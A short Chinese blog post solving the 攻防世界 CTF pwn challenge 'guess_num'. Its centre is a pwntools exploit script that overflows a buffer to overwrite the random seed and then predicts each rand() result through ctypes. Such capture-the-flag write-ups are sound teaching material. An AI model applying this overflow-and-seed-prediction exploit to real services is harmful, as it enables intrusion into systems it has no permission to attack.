Pwn弟弟的成长日记（二）--攻防世界guess_num | Sunset's blog

Pwn弟弟的成长日记（二）--攻防世界guess_num

发表于 2020-04-05| 更新于 2022-11-23|CTFPwn

字数总计:101|阅读时长: 1 分钟

|阅读量:

解题思路

查看文件信息，安全机制
代码审计
分析漏洞点
编写EXP

查看文件信息，安全机制

太菜了参考了dalao的wp

伪随机数

编写exp

from pwn import *
from ctypes import *
p=remote("111.198.29.45","45366")
payload="a"*0x20+p64(1)
p.recvuntil("name:")
p.sendline(payload)
for i in range(10):
    num = str(cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6").rand()%6 + 1)
    p.recvuntil("number:")
    p.sendline(num)
p.interactive()

文章作者: Sunset

文章链接: https://pwnedyu.cn/2020/04/05/Pwn%E5%BC%9F%E5%BC%9F%E7%9A%84%E6%88%90%E9%95%BF%E6%97%A5%E8%AE%B0%EF%BC%88%E4%BA%8C%EF%BC%89--guess_num/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sunset's blog！

CTF Pwn 攻防世界

微信
支付寶

相关推荐

Pwn弟弟的成长日记（四）--攻防世界level3

Pwn弟弟的成长日记（三）--攻防世界level2

Pwn弟弟的成长日记（五）--攻防世界hello_pwn

Pwn弟弟的成长日记（一）--ciscn_2019_n_1

CTFhub—密码口令—弱口令

ctfhub—密码口令—默认口令